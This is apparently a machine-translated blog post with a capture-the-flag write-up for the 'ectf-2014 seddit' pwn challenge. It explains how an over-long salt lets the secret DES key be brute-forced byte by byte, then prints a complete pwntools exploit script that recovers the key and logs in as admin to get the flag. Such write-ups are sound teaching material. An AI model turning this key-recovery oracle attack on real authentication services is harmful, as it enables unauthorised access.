当前位置:网站首页>[BMZCTF-pwn] ectf-2014 seddit
[BMZCTF-pwn] ectf-2014 seddit
2022-07-05 06:16:00 【Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi】
At first, I saw a lot of spills , But because of canary None of this works . Or read the program from the beginning .
The program contains 3 block :
- First, read the user name and salt Salt is added after salt in the backstage key Get the key and then calculate the password through the key .
- Log in with your username and password , User name is admin And after successful verification flag
- of no avail
Obviously, if 1 Step by step admin It's easy to do. . Ran Wu .
This salt overflows : Insufficient salt length 7 Bit time will be supplemented 7 Add 7 position key. If exceeded 7 Bits are used key Will be reduced accordingly . When salt is 13 Only the first... Is used in bit 1 position key. Then you can easily explode key Value . And then use des Calculate the password ok 了 .
unsigned __int64 __fastcall sub_400A04(__int64 a1, _QWORD *a2)
{
char v3[140]; // [rsp+20h] [rbp-B0h] BYREF
int fd; // [rsp+ACh] [rbp-24h]
char dest[16]; // [rsp+B0h] [rbp-20h] BYREF
char v6[8]; // [rsp+C0h] [rbp-10h] BYREF
unsigned __int64 v7; // [rsp+C8h] [rbp-8h]
v7 = __readfsqword(0x28u);
*a2 = 0LL;
*(_QWORD *)dest = 0LL;
fd = open("key", 0);
if ( strlen(byte_6020C0) <= 6 ) // When salt by 13 When a , Only for 1 position key It can be blasted in sequence key
strncpy(&byte_6020C0[strlen(byte_6020C0)], "aaaaaaa", 7 - strlen(byte_6020C0));
strncpy(dest, byte_6020C0, strlen(byte_6020C0));
read(fd, &dest[strlen(byte_6020C0)], 7uLL);
dest[14] = 0;
close(fd);
DES_string_to_key(dest, v6);
DES_set_key(v6, v3);
DES_ecb_encrypt(a1, a2, v3, 1LL);
return __readfsqword(0x28u) ^ v7;
}
The other is to write programs des It's not necessarily easy , You can directly put the original program patch Let him not check admin user name , In this way, you can get the password through the original program .
from pwn import *
local = 1
if local == 1:
p = process('./pwn')
else:
p = remote('node4.buuoj.cn', 28546)
elf = ELF('./pwn')
context.arch = 'amd64'
def getkey(salt):
p.sendlineafter(b"What would you like to do? ", b'1')
p.sendlineafter(b"Enter username:", b's')
p.sendlineafter(b"Enter salt:", salt)
p.recvuntil(b'Your password is: ')
return p.recv(16)
def password():
tp = process('./pwn_local')
tp.sendlineafter(b"What would you like to do? ", b'1')
tp.sendlineafter(b"Enter username:", b'admin')
tp.sendlineafter(b"Enter salt:", b'aaaaaaa')
tp.recvuntil(b'Your password is: ')
return tp.recv(16)
def getflag(password):
p.sendlineafter(b"What would you like to do? ", b'2')
p.sendlineafter(b"Enter username:", b'admin')
p.sendlineafter(b"Enter password:", password)
return p.recv()
key = b''
for i in range(13,6,-1):
salt = b'A'*i
tmpkey = getkey(salt)
print(tmpkey)
for j in range(0x21,0x80):
tmp = getkey(salt+key+p8(j)) # Bitwise shortened salt+key Known parts + guess The same password is correct key
if tmp == tmpkey:
key += p8(j)
print('key:', key)
break
open('key', 'wb').write(key)
password = password() # Use local program operation to find the password
print(password)
context.log_level = 'debug'
print(getflag(password))
pause()
边栏推荐
- Doing SQL performance optimization is really eye-catching
- LeetCode 1200. Minimum absolute difference
- Leetcode-9: palindromes
- Collection: programming related websites and books
- 【Rust 笔记】14-集合(上)
- Daily question 1688 Number of matches in the competition
- LeetCode 0107. Sequence traversal of binary tree II - another method
- 开源存储这么香,为何我们还要坚持自研?
- 做 SQL 性能优化真是让人干瞪眼
- Sword finger offer II 058: schedule
猜你喜欢
Navicat连接Oracle数据库报错ORA-28547或ORA-03135
1.15 - input and output system
MatrixDB v4.5.0 重磅发布,全新推出 MARS2 存储引擎!
Liunx starts redis
4. 对象映射 - Mapping.Mapster
2021apmcm post game Summary - edge detection
QQ电脑版取消转义符输入表情
Error ora-28547 or ora-03135 when Navicat connects to Oracle Database
[practical skills] technical management of managers with non-technical background
MySQL advanced part 1: index
随机推荐
liunx启动redis
[leetcode] day94 reshape matrix
js快速将json数据转换为url参数
Leetcode-31: next spread
Leetcode-6111: spiral matrix IV
数据可视化图表总结(二)
MySQL advanced part 2: MySQL architecture
Basic explanation of typescript
The sum of the unique elements of the daily question
CPU内核和逻辑处理器的区别
SQLMAP使用教程(二)实战技巧一
leetcode-6108:解密消息
SQLMAP使用教程(一)
leetcode-6109:知道秘密的人数
实时时钟 (RTC)
Records of some tools 2022
对for(var i = 0;i < 5;i++) {setTimeout(() => console.log(i),1000)}的深入分析
Quickly use Amazon memorydb and build your own redis memory database
LVS简介【暂未完成(半成品)】
Overview of variable resistors - structure, operation and different applications